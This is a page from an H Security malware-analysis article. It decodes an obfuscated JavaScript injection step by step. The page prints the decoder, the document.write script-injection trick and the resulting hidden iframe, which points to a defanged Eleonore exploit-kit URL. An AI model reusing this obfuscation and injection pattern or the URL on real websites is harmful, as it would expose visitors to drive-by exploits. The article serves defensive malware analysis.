In association with heise online

The hidden iFrame

To analyse the iFrame, I download the index.php file it points to with the wget command-line tool and open the file in an editor.

<div style='display: none;'>
<i id =i6C>qqfppBfqZfppSf[ ... ]3fSBfq</i>
<div id =pJ0rU7V>pf33[ ... ]BfEZf</div>
</div>

It is immediately clear that something strange is happening here: A block of HTML code which defines various HTML elements with different IDs, but all they contain is long character strings. Wonder what they're used for? We'll probably find out; but first let's look into it a bit further. The rest of the file consists of rather obscure JavaScript code, containing such commands as:

function tG7A8Qj(qmueigi){...}

And then later:

var VunDhir=tG7A8Qj(yOaE3xU);


Zoom At first glance, it all looks like cryptic gobbledegook. Only an expert's eye can detect structures and processes.
It looks like the code has been passed through an obfuscator, replacing variable and function names with random character strings to make the code as unreadable as possible. It's quite clear that somebody is trying to hide something here. But they won't foil me so easily. Further down, I find a field which contains references to the two IDs mentioned above:

var fSxMadF = new Array("i6C","pJ0rU7V");

It appears that the long character strings will be needed later; they might even be commands in encoded form. Overall, the code defines four functions. The code that follows is directly executed by the browser when accessing the page:

var yOaE3xU="";
var o81fCJv = fSxMadF.length;
for (VunDhir=0; o81fCJv>VunDhir; VunDhir++) {
var yOaE3xU = yOaE3xU + w5JGZaJ(fSxMadF, VunDhir);
}

Although at first glance this may look like a mess, it is still reasonably understandable. Therefore, first I try a manual analysis: The yOaE3xU variable is initialised with the empty string, and the o81fCJv variable is given a value of 2, because the array contains the two ID tags from the code above. The for loop calls the w5JGZaJ() function twice:

function w5JGZaJ(fSxMadF, VunDhir) {
return VunDhir=document.getElementById
(fSxMadF[VunDhir]).innerHTML;
}

Look at that – it accesses the content of the HTML elements with the already familiar i6C and pJ0rU7V IDs via getElementById() and innerHTML(). The content of the respective elements is then assigned to the yOaE3xU variable in the for loop. As a result, this variable contains the long character strings from the HTML code when the loop is completed.

Let's carry on:

var VunDhir=tG7A8Qj(yOaE3xU);

Ok – this is probably where the scrambled characters are decoded. A glance at the decoding function, however, reveals even more gobbledegook

function tG7A8Qj(qmueigi){
var Vvl57xe,dHnHlum,VUH4Mre,f9ft2GY="",
keMFvAW="B6SjRiQwmJfo1p9qbLl7cHI5EMFvWC8ZNtrzGVaXgxDekhnd0";
for(Vvl57xe=0;Vvl57xe<qmueigi.length;Vvl57xe++)
{dHnHlum=qmueigi.charAt(Vvl57xe);
....

And there is no end in sight, as a further decryptor() function is called towards the end. High time for another session with SpiderMonkey! The monkey initially trips over the getElementById() and innerHTML() methods, which are only available in the browser context. Luckily, I already know the result of the for loop from my manual analysis and can, therefore, assign a suitable value to the variable myself.

In a second attempt, SpiderMonkey gets a bit further, but then aborts again, issuing an error message which points to a missing reference to document in the following lines of code:

var gogle=document;
var yandex=document;
gogle.write("<scri"+"pt>");
yandex.write(VunDhir);
document.write("</sc"+"ript>");

This is a simple obfuscation method: The document object is assigned to several variables which are then used to re-execute the write() method in order to fire the code into the currently loaded page. For this purpose, the unpacked code is enclosed in scrambled script tags. To finally get to the injected code, I can replace the entire block with print(VunDhir);. SpiderMonkey produces the following result:

document.write("<iframe
src=\"hxxp://tissot333.cn/eleonore/pdf.php?spl=pdf_all\"
width=\"148\" height=\"261\" frameborder=\"0\"></iframe>");

Next: Sprayer at work

Print Version | Permalink: http://h-online.com/-1019940
  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit
 


  • July's Community Calendar





The H Open

The H Security

The H Developer

The H Internet Toolkit